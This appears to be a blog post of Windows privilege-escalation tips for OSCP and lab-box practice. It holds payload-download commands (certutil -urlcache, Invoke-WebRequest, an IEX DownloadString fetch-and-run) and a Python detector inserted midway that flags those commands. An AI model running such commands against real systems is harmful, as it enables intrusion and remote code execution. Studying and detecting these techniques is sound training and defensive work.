Windows priv esc tools. No Metasploit here.

Just a little compilation of a few of my favorite resources for non-Metasploit Windows priv esc using precompiled .exes and priv checkers. The basics really.

Windows… Not my strongest area when it comes to priv escalation, let alone without relying on the lovely tool set of Metasploit. So I have devoted a good few evenings of prep to going through some HTB Windows boxes. I won’t bother reiterating HTB write-ups here as there are plenty of high quality write-ups for old boxes. I have also been re-doing some I had previously completed, minus any Metasploit help. I have started to compile a pretty good list of things to dig me out of a hole when I get onto a Windows box. Mainly these are resources other people have compiled, so hats off to them. I don’t plan on reinventing the wheel, but being able to quickly find these references when you need them is great.

The cmd basics. Run through a very full list found here; a quick fly-through of some of these can often get you on the right path on some of the more CTF-style boxes where things have been left for you. However, as is often the case from what I have seen with Windows, it will boil down to some form of uncompiled exploit from a missing patch on the older machines (see the above link for a nice one-liner to check current hotfixes). The first challenge, however, can be getting these payloads onto the box without Metasploit’s help of auto pwning through the shell. I recommend looking into certutil or PowerShell commands for this. There are a tonne of other ways, but these two are my go-to as they are as near to wget as I can get. All you need is write access to a directory and off you go.


certutil.exe -urlcache -split -f http://{host}/file.txt localfilename.txt


Invoke-WebRequest -Uri $url -OutFile $output

Combine the above with the usual Python SimpleHTTPServer and you’re away: you have a way of getting things onto boxes. There are also variations for PowerShell to invoke the script directly from your server without ever having to save it to disk on the victim machine; this can be very useful. IppSec covers this technique a few times in his videos. It is also covered amongst the payloads at PayloadsAllTheThings (powershell IEX (New-Object Net.WebClient).DownloadString… etc.)
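Seen from the defender's side, the three transfer methods above leave recognisable process command lines. The following is an added example, not part of the original post, that flags them in constructed process-creation events and notes whether the call itself saves a file; the event fields, host names and the 192.0.2.10 address are assumptions made for the illustration.

```python
import re

# Each rule lists regexes that must ALL match one command line (any order).
# They cover only the three transfer methods named in the post.
RULES = {
    "certutil-urlcache": [r"\bcertutil(\.exe)?\b", r"[-/]urlcache\b", r"https?://"],
    "iwr-outfile": [r"\b(invoke-webrequest|iwr)\b", r"\s-outf"],
    "webclient-downloadstring": [r"\bnet\.webclient\b", r"\.downloadstring\s*\("],
}
COMPILED = {name: [re.compile(p, re.I) for p in pats] for name, pats in RULES.items()}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def classify(command_line):
    """Return the names of all rules that match a process command line."""
    return [name for name, pats in COMPILED.items()
            if all(p.search(command_line) for p in pats)]


def triage(events):
    """Turn process-creation events into findings with the remote URL, if literal."""
    findings = []
    for ev in events:
        for rule in classify(ev["command_line"]):
            url = URL_RE.search(ev["command_line"])
            findings.append({
                "host": ev["host"],
                "rule": rule,
                "url": url.group(0) if url else None,
                # DownloadString returns the script as a string; the call saves no file.
                "writes_file": rule != "webclient-downloadstring",
            })
    return findings


# Constructed sample events (hypothetical hosts, documentation-range address).
SAMPLE_EVENTS = [
    {"host": "WS01", "command_line": "certutil.exe -urlcache -split -f http://192.0.2.10/file.txt localfilename.txt"},
    {"host": "WS01", "command_line": "certutil -hashfile setup.exe SHA256"},
    {"host": "WS02", "command_line": "powershell -c Invoke-WebRequest -Uri $url -OutFile $output"},
    {"host": "WS03", "command_line": "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The benign `certutil -hashfile` line produces no finding, and the `Invoke-WebRequest` event reports no URL because the address sits in a variable rather than on the command line.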

For PowerShell-based tools and reverse shells there is Nishang, which is a great little tool set; it’s been added to my OSCP tool kit. The PowerShell reverse shells are nice and the other modules can prove useful. I don’t know how many PowerShell / Windows boxes I will encounter or even what ancient version they will be running, but I’d rather be comfortable than caught off guard and have to play catch-up.

Have a Windows VM! Compiling Windows exploits is sometimes just so much easier and more reliable when using a Windows machine. I always keep an old Win 7 and Win 10 VM sat around for testing and compiling code if necessary. It doesn’t have to be licensed, just a nice test box; snapshot it and wipe it after each session. Always check for a precompiled exploit first! It might save you a bit of time. This git is awesome; there’s a few other iffy gits around, and lots of precompiled ones don’t work or are nasty applications in themselves, so use with caution.

And last but not least, the best and most useful piece of the Windows priv esc list: Windows-Exploit-Suggester. It’s an amazing tool; feed it a little sysinfo and it will provide you with some useful insights. There is also Watson, which is very similar; however, I started off with Windows-Exploit-Suggester and have stuck with it really.

Only other piece of advice, to myself if no one else: brush up on the basic cmds for Windows. I spend a huge amount of time in the Linux terminal but minimal time in the cmd window. Particularly for when PowerShell fails to run properly back through a shaky reverse shell.

Hope these links prove useful! I will publish a full resource list once / if I complete the OSCP, with all the links to the gits and pieces I used.
